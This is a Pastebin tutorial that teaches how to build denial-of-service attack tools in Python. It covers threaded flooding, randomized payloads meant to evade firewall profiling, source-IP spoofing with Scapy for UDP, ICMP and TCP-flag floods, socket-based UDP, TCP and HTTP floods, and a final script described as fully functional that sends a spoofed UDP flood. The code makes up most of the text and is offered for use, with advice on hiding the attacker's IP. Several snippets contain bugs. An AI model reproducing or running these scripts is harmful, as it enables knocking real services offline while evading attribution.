Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ____ ___ __ __ ____ _ _ ____ ____
- | _ \ |_ _| \ \ / / _ | _ \ _ _| |_| |__ ___ _ __ | _ \ ___/ ___|
- | | | | | | \ V / (_) | |_) | | | | __| '_ \ / _ \| '_ \ | | | |/ _ \___ \
- | |_| | | | | | _ | __/| |_| | |_| | | | (_) | | | | | |_| | (_) |__) |
- |____/ |___| |_| (_) |_| \__, |\__|_| |_|\___/|_| |_| |____/ \___/____/
- |___/
- This guide explains how to properly and efficiently write a Denial of Service attack
- using the computer language Python. The focus is more on the skeletion / setup of the
- attack rather than the packet generation itself, however basic attacks such as UDP, TCP,
- HTTP, SYN, ACK, ICMP, etc are covered.
- ===================================================================================
- ┌┬┐ ┬ ┬ ┬─┐ ┌─┐ ┌─┐ ┌┬┐ ┬ ┌┐┌ ┌─┐
- │ ├─┤ ├┬┘ ├┤ ├─┤ ││ │ │││ │ ┬
- ┴ ┴ ┴ ┴└─ └─┘ ┴ ┴ ─┴┘ ┴ ┘└┘ └─┘
- Here an example is given to show how to execute multiple concurrent thread
- procedures (w/ thread arguements)
- import threading, time
- def _attack(ip, _port, abort_event):
- while not abort_event.is_set():
- try:
- # malicious packet generation here
- except:
- pass
- def main():
- tasks = []
- abort_event = threading.Event()
- # run 5 threads
- for _ in range(0, 5):
- t = threading.Thread(target=_attack, args=('127.0.0.1', 80, abort_event))
- t.daemon = True
- tasks.append(t)
- t.start()
- try:
- i = input('Strike <ENTER> to abort...')
- except KeyboardInterrupt:
- pass
- # trigger thread abort-event
- abort_event.set()
- # ensure all thread/s are complete
- for t in tasks:
- t.join()
- if __name__ == "__main__":
- main()
- ===================================================================================
- ┌┬┐ ┬ ┬ ┬─┐ ┌─┐ ┌┬┐ ┬ ┌─┐ ┌┐┌
- ││ │ │ ├┬┘ ├─┤ │ │ │ │ │││
- ─┴┘ └─┘ ┴└─ ┴ ┴ ┴ ┴ └─┘ ┘└┘
- If you would like to see the thread/s active for a certain period in seconds,
- this method can be used instead of a manual user-interrupt
- tasks = []
- abort_event = threading.Event()
- # run 15 threads
- for _ in range(0, 5):
- t = threading.Thread(target=_attack, args=('127.0.0.1', 80, abort_event))
- t.daemon = True
- tasks.append(t) # add threads to list
- t.start()
- # attack duration set for 5min
- _quit = time.time() + 300
- try:
- while time.time() <= _quit:
- pass
- except KeyboardInterrupt:
- # catch CTRL+C
- pass
- # trigger thread abort-event
- abort_event.set()
- # ensure all thread/s are complete
- for t in tasks:
- t.join()
- ===================================================================================
- ┌┬┐ ┌─┐ ┌┬┐ ┌─┐ ┌┐ ┬ ┬ ┌─┐ ┌─┐ ┌─┐ ┬─┐
- ││ ├─┤ │ ├─┤ ├┴┐ │ │ ├┤ ├┤ ├┤ ├┬┘
- ─┴┘ ┴ ┴ ┴ ┴ ┴ └─┘ └─┘ └ └ └─┘ ┴└─
- When sending volumetric attacks (such as UDP, TCP, ICMP, etc) data should be
- generated. However, if you send a "static buffer" or a string of text that is
- fixed in content and length, it becomes easier to profile/block at the firewall
- level. To combat this, the below code will generate data on the basis of random
- characters and will choose from a random length range.
- import random, string
- def _attack():
- # character pool using letters, numbers, and symbols
- chars = string.ascii_letters + string.digits + string.printable
- while True:
- try:
- # generate random junk anywhere from 1,200 to 4,096 characters
- payload = ''.join(random.choice(chars) for _ in range(random.randint(1200, 4096)))
- payload.encode()
- # packet generation here
- except:
- pass
- ===================================================================================
- ┬ ┬ ┌─┐ ┌─┐ ┌┬┐ ┬─┐ ┌─┐ ┌─┐ ┌─┐ ┬ ┬ ┬ ┌┬┐ ┬ ┌─┐ ┌┐┌
- ├─┤ │ │ └─┐ │ ├┬┘ ├┤ └─┐ │ │ │ │ │ │ │ │ │ │││
- ┴ ┴ └─┘ └─┘ ┴ ┴└─ └─┘ └─┘ └─┘ ┴─┘ └─┘ ┴ ┴ └─┘ ┘└┘
- You may choose to have your script (either by CLI arguements or user-input) accept
- either an IP or URL/domain when attacking. By using the function below, it doesn't
- matter if the user enters either an IP or URL/domain. It will automatically be
- processed and returned as the resolved IP address.
- from urllib.parse import urlparse
- def resolve(_target):
- try:
- xhost = _target.lower()
- if not (xhost.lower().startswith("http://") or xhost.lower().startswith("https://")):
- xhost = "http://" + xhost
- _domain = urlparse(xhost).netloc
- _ip = socket.gethostbyname(_domain)
- return _ip
- except:
- # invalid ip/hostname
- sys.exit("DNS resolution error! Exiting...")
- def main():
- _target = input('Enter in an IP or site: ')
- _ip = resolve(_target)
- print('Now attacking ' + _ip)
- if __name__ == "__main__":
- main()
- ===================================================================================
- ┌─┐ ┬ ┬ ┌─┐ ┬─┐ ┌─┐ ┬ ┬ ┌┬┐ ┌─┐ ┌┐┌ ┌┬┐ ┌─┐
- │ │ │ ├─┤ ├┬┘ │ ┬ │ │ │││ ├┤ │││ │ └─┐
- └─┘ ┴─┘ ┴ ┴ ┴ ┴└─ └─┘ └─┘ ┴ ┴ └─┘ ┘└┘ ┴ └─┘
- Instead of using user-inputs, it may be more beneficial to use command line arguements
- instead.
- Example: python3 MyScript.py www.example.com 80 300
- This demonstrates that the script accepts a hostname, a port, and a duration in
- seconds. Here is an example of how you would do this
- import sys
- def main():
- # if the user enters in more of less
- # than 4 arguments, exit script
- if len(sys.argv) != 4:
- sys.exit('Usage: <domain> <port> <time>')
- # Display the information back to the user
- print('Target: ' + sys.argv[1])
- print('Port #: ' + sys.argv[2])
- print('Length: ' + sys.argv[3] + ' seconds.')
- sys.exit()
- if __name__ == "__main__":
- main()
- Let it be known: although the user is required to enter in three arguments (the
- domain, port, and time) the 'if len(sys.argv) != 4:' line specifies that four
- arguments must be given. That is because sys.argv[0] (or argument zero) is actually
- the name of the script (ex: MyScript.py). Although it is CLI arg zero, it is still
- counted in the grand total.
- ===================================================================================
- ┬ ┌─┐ ┌─┐ ┌─┐ ┌─┐ ┌─┐ ┌─┐ ┬ ┌┐┌ ┌─┐
- │ ├─┘ └─┐ ├─┘ │ │ │ │ ├┤ │ │││ │ ┬
- ┴ ┴ └─┘ ┴ └─┘ └─┘ └ ┴ ┘└┘ └─┘
- When making use of the SCAPY library in python, you can spoof your IP address (aka, the
- source IP) to a randomly generated address. This means you no longer need to rely on VPN
- or proxy for anonymization. Note: not all protocols can be spoofed. UDP and ICMP can by
- spoofed, but not TCP and HTTP. However...The handshake that takes place before a TCP
- socket is establish CAN be spoofed, hence a spoofed SYN, SYN-ACK, or ACK flood.
- Keep in mind: Scapy requires root priviliges to run, since it creates a Raw Socket to
- spoof and send the data. Not running the script as root/admin will cause errors and may
- end up exposing your source IP address.
- from scapy.all import *
- def _attack():
- while True:
- try:
- # Generate a junk buffer to send
- payload = str('Get rekt noob!').encode()
- # Generate a fake IP address
- fake_ip = ".".join(str(random.randint(0, 255)) for _ in range(4))
- # Below are a few types of spoofed packets scapy can send
- # Attack is being sent to 127.0.0.1:80
- # UDP packet
- pkt = IP(src=fake_ip, dst='127.0.0.1') / UDP(sport=RandShort(), dport=80) / payload
- # ICMP packet
- socket = conf.L2socket(iface='eth0') #whatever your NIC interface is
- pkt = IP(src=fake_ip, dst='127.0.0.1') / ICMP(type=8,code=0) / payload
- # SYN packet
- pkt = IP(src=fake_ip, dst='127.0.0.1') / TCP(sport=RandShort(), dport=80), flags="S")
- # ACK packet
- pkt = IP(src=fake_ip, dst='127.0.0.1') / TCP(sport=RandShort(), dport=80), flags="S")
- # SYN-ACK packet
- pkt = IP(src=fake_ip, dst='127.0.0.1') / TCP(sport=RandShort(), dport=80), flags="S")
- # DOMINATE packet
- pkt = IP(src=fake_ip, dst='127.0.0.1') / TCP(sport=RandShort(), dport=80), flags="SEC")
- # XMAS packet
- pkt = IP(src=fake_ip, dst='127.0.0.1') / TCP(sport=RandShort(), dport=80), flags="FSRPAUEC")
- # NULL packet
- pkt = IP(src=fake_ip, dst='127.0.0.1') / TCP(sport=RandShort(), dport=80), flags="")
- # send spoofed packet
- send(pkt, verbose=False)
- except:
- pass
- ===================================================================================
- ┌─┐ ┌─┐ ┌┐┌ ┌─┐ ┬ ┬─┐ ┌┬┐ ┬─┐ ┌─┐ ┌─┐ ┌┬┐
- │ │ │ │││ ├┤ │ ├┬┘ │││ ├┬┘ │ │ │ │ │
- └─┘ └─┘ ┘└┘ └ ┴ ┴└─ ┴ ┴ ┴└─ └─┘ └─┘ ┴
- As mentioned above, Scapy as well as other libraries require root/administrator
- elevation in order to run correctly. To confirm that the script is root, you can
- use this below code to determine if you have the correct rights on Linux/Unix
- systems
- import os, sys
- def _check_root():
- if not os.geteuid() == 0:
- sys.exit('Script requires root elevation! Exiting...')
- Let it be known: although Scapy DOES technically run on Windows operating systems,
- it can be buggy and doesn't possess all of its full functionality due to OS limitations.
- It is always better to run these scripts in a Linux/Unix environment. Additionally, the
- script above confirms if you have root on a Linux/Unix system, not Windows.
- ===================================================================================
- ┬ ┬ ┌┬┐ ┌─┐ ┌┬┐ ┌─┐ ┌─┐ ┌─┐ ┌┐┌ ┌┬┐ ┬ ┬ ┌┬┐ ┌┬┐ ┌─┐
- │ │ ││ ├─┘ │ │ ├─┘ ├─┤ │││ ││ ├─┤ │ │ ├─┘
- └─┘ ─┴┘ ┴ ┘ ┴ └─┘ ┴ ┘ ┴ ┴ ┘└┘ ─┴┘ ┴ ┴ ┴ ┴ ┴
- A more native method to launch UDP or TCP attacks via Python can be done using
- the Sockets library. Note: this method does not support spoofing and can leave
- your source IP exposed. User discretion is advised.
- import socket
- def _udp(ip, _port, abort_event):
- while not abort_event.is_set():
- try:
- payload = str('Get rekt noob!').encode()
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- s.connect((_ip, int(_port)))
- s.send(payload)
- except:
- pass
- def _tcp(ip, _port, abort_event):
- while not abort_event.is_set():
- try:
- payload = str('Get rekt noob!').encode()
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- s.settimeout(1) #timeout 1sec
- s.connect((_ip, int(_port)))
- s.send(payload)
- # reuse socket until force-closed by the endpoint.
- # This helps reduce socket exhaustion ('OSError' exceptions)
- while not abort_event.is_set():
- s.send(payload)
- s.close()
- except:
- s.close()
- In order to send an HTTP flood, you must first start out with a TCP socket. You
- connect on the web server's default HTTP port (default 80) and stream HTTP headers
- over the socket. This then upgrades the request from the Transport Layer to the
- Application layer and thus you've sent an HTTP request.
- import socket, random, string
- _useragent = [
- 'Opera/7.51 (Windows NT 5.1; U) [en]',
- 'Mozilla/4.5 [de] (Macintosh; I; PPC)',
- 'Mozilla/4.8 [en] (Windows NT 5.1; U)'
- ]
- def _http(ip, _domain, _port, abort_event):
- global _useragent
- # create reusable HTTP headers to send
- _static = "\r\nUser-agent: {}\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=10, max=1000\r\n"
- while not abort_event.is_set():
- try:
- # send initial HTTP header
- header = "GET / HTTP/1.1\r\nHost:" + _domain + "\r\n"
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((_ip, int(_port)))
- s.send(header.encode())
- # re-use socket / send more unique headers
- while not abort_event.is_set():
- # randomize URL query + user-agent header
- junk = ''.join(random.choices(string.ascii_letters + string.digits, k=int(random.randint(10, 45))))
- header = "GET /{} HTTP/1.1\r\nHost:{} ".format(junk, _domain) + _static.format(random.choice(_usr))
- s.send(header.encode())
- s.close()
- except:
- s.close()
- ===================================================================================
- ┌─┐ ┬ ┌┐┌ ┬ ┌─┐ ┬ ┬ ┌─┐ ┌┬┐ ┌─┐ ┬─┐ ┌─┐ ┌┬┐ ┬ ┬ ┌─┐ ┌┬┐
- ├┤ │ │││ │ └─┐ ├─┤ ├┤ ││ ├─┘ ├┬┘ │ │ ││ │ │ │ │
- └ ┴ ┘└┘ ┴ └─┘ ┴ ┴ └─┘ ─┴┘ ┴ ┴└─ └─┘ ─┴┘ └─┘ └─┘ ┴
- Here is an example for a fully functional attack script, which uses the Scapy
- library to send a spoofed UDP volumetric flood to the target for a specific
- amount of time. Root elevation checks for Linux/Unix and hostname resolution
- are present in this script. Buffer is has dynamic character generation and is
- of a non-fixed length.
- #!/usr/bin/env python3
- import sys
- import threading
- import os
- import socket
- import string
- import random
- import time
- from scapy.all import *
- from urllib.parse import urlparse
- def worker(ip, min_bytes, max_bytes, abort_event):
- while not abort_event.is_set():
- try:
- payload = ''.join(random.choice(string.printable) for _ in range(random.randint(int(min_bytes), int(max_bytes))))
- src_ip = ".".join(str(random.randint(0, 255)) for _ in range(4))
- pkt = IP(src=src_ip, dst=ip) / UDP(sport=RandShort(), dport=int(sys.argv[2])) / payload.encode()
- send(pkt, verbose=False)
- except:
- pass
- def resolve_domain(target):
- target = target.lower()
- if not (target.startswith('http://') or target.startswith('https://')):
- target = 'http://' + target
- try:
- domain = urlparse(target).netloc
- ip = socket.gethostbyname(domain)
- return ip
- except Exception as e:
- sys.exit('DNS resolution failed. Exiting...')
- def main():
- os.system('clear')
- if not os.geteuid() == 0:
- sys.exit('Script requires root elevation!')
- if len(sys.argv) != 6:
- sys.exit('Usage: <target> <port> <byte range: x-y> <time> <threading>')
- try:
- min_bytes, max_bytes = sys.argv[3].split('-')
- except ValueError:
- sys.exit('Invalid byte range specified. Exiting...')
- target_ip = resolve_domain(sys.argv[1])
- print(' Attacking ' + target_ip + ':' + sys.argv[2] + ' for ' + sys.argv[4] + ' seconds. Strike <CTRL+C> to abort...\r\n')
- tasks = []
- abort_event = threading.Event()
- for _ in range(0, int(sys.argv[5])):
- t = threading.Thread(target=worker, args=(target_ip, min_bytes, max_bytes, abort_event))
- t.daemon = True
- tasks.append(t)
- t.start()
- _quit = time.time() + int(sys.argv[4])
- try:
- while time.time() <= _quit:
- pass
- except KeyboardInterrupt:
- pass
- abort_event.set()
- for t in tasks:
- t.join()
- sys.exit('\r\n Done!\r\n')
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement